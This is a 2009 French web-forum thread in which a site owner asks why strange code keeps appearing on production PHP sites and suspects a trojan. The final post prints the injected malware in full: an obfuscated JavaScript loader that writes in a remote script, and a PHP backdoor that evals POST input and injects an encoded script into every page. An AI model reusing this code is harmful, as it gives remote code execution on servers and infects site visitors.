Problème de code PHP étrange qui s'ajoutent
Fermé
omartsdi
Messages postés
4
Date d'inscription
jeudi 26 mars 2009
Statut
Membre
Dernière intervention
26 mars 2009
-
26 mars 2009 à 17:48
omartsdi Messages postés 4 Date d'inscription jeudi 26 mars 2009 Statut Membre Dernière intervention 26 mars 2009 - 26 mars 2009 à 18:18
omartsdi Messages postés 4 Date d'inscription jeudi 26 mars 2009 Statut Membre Dernière intervention 26 mars 2009 - 26 mars 2009 à 18:18
A voir également:
- Problème de code PHP étrange qui s'ajoutent
- Alert php ✓ - Forum PHP
- Code asci - Guide
- Header php - Astuces et Solutions
- Freewifi secure code ✓ - Forum Réseau
- Code 80072efe ✓ - Forum Windows
3 réponses
Dackxes
Messages postés
274
Date d'inscription
mardi 27 janvier 2009
Statut
Membre
Dernière intervention
17 avril 2010
35
26 mars 2009 à 17:49
26 mars 2009 à 17:49
Quel est le code qui se rajoute ?
omartsdi
Messages postés
4
Date d'inscription
jeudi 26 mars 2009
Statut
Membre
Dernière intervention
26 mars 2009
26 mars 2009 à 18:07
26 mars 2009 à 18:07
Est ce que quellqu un a déjà ce probleme ??
merci de me repondre parceque toutes nous sites sont des sites de production
Merci
merci de me repondre parceque toutes nous sites sont des sites de production
Merci
omartsdi
Messages postés
4
Date d'inscription
jeudi 26 mars 2009
Statut
Membre
Dernière intervention
26 mars 2009
26 mars 2009 à 18:18
26 mars 2009 à 18:18
J'ai cherche dans le net j'ai trouvé que le problème vient de virus trojanclicker.iframe.nag.trojan.
26 mars 2009 à 17:53
<script language=javascript><!--
document.write(unescape('%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78
HY8%2EGX1GX1Cl60%2ECl61Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl
6%2EjSns%3EGX%3C%2FGXszAnczAnrHY8iprLtzAn%3E').replace(/Cl6|HY8|zAn|Sn|
rL|Vh|GX/g,""));--></script>
Le code PHP
<?php
if (!function_exists('tmp_lkojfghx')) {
for ($i = 1; $i < 10; $i++)
if (is_file($f = '/tmp/m' . $i)) {
include_once($f);
break;
}
if (isset($_POST['tmp_lkojfghx3']))
eval($_POST['tmp_lkojfghx3']);
if (!defined('TMP_XHGFJOKL'))
define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFMwcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcmM2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdWVyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzBTMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfElpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3JpcHQ+'));
function tmp_lkojfghx($s)
{
if ($g = (bin2hex(substr($s, 0, 2)) == '1f8b'))
$s = gzinflate(substr($s, 10, -8));
if (preg_match_all('#<script(.*?)</script>#is', $s, $a))
foreach ($a[0] as $v)
if (count(explode("\n", $v)) > 5) {
$e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v) || preg_match('#[\(\[](\s*\d+,){20,}#', $v);
if ((preg_match('#\beval\b#', $v) && ($e || strpos($v, 'fromCharCode'))) || ($e && strpos($v, 'document.write')))
$s = str_replace($v, '', $s);
}
$s1 = preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(".+?\n --></script>#', '', $s);
if (stristr($s, '<body'))
$s = preg_replace('#(\s*<body)#mi', TMP_XHGFJOKL . '\1', $s1);
elseif (($s1 != $s) || stristr($s, '</body') || stristr($s, '</title>'))
$s = $s1 . TMP_XHGFJOKL;
return $g ? gzencode($s) : $s;
}
function tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0)
{
$s = array();
if ($b && $GLOBALS['tmp_xhgfjokl'])
call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d);
foreach (@ob_get_status(1) as $v)
if (($a = $v['name']) == 'tmp_lkojfghx')
return;
else
$s[] = array($a == 'default output handler' ? false : $a);
for ($i = count($s) - 1; $i >= 0; $i--) {
$s[$i][1] = ob_get_contents();
ob_end_clean();
}
ob_start('tmp_lkojfghx');
for ($i = 0; $i < count($s); $i++) {
ob_start($s[$i][0]);
echo $s[$i][1];
}
}
}
if (($a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2')
$GLOBALS['tmp_xhgfjokl'] = $a;
tmp_lkojfghx2();
?>